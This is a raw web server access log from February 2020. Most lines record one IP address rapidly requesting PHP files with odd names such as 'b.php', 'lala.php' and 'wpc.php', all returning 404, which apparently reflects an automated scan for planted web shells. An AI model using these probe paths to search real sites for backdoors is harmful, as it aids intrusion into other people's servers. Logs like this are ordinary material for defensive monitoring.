106.13.88.214 - - [04/Feb/2020:18:08:40 +0100] "GET /htdocs.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
212.91.246.72 - - [04/Feb/2020:18:08:42 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
106.13.88.214 - - [04/Feb/2020:18:08:43 +0100] "GET /b.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
106.13.88.214 - - [04/Feb/2020:18:08:43 +0100] "GET /sane.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
106.13.88.214 - - [04/Feb/2020:18:08:51 +0100] "GET /desktop.ini.php HTTP/1.1" 404 320 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
106.13.88.214 - - [04/Feb/2020:18:08:51 +0100] "GET /z.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
106.13.88.214 - - [04/Feb/2020:18:08:51 +0100] "GET /lala.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
106.13.88.214 - - [04/Feb/2020:18:08:53 +0100] "GET /lala-dpr.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
106.13.88.214 - - [04/Feb/2020:18:08:53 +0100] "GET /wpc.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
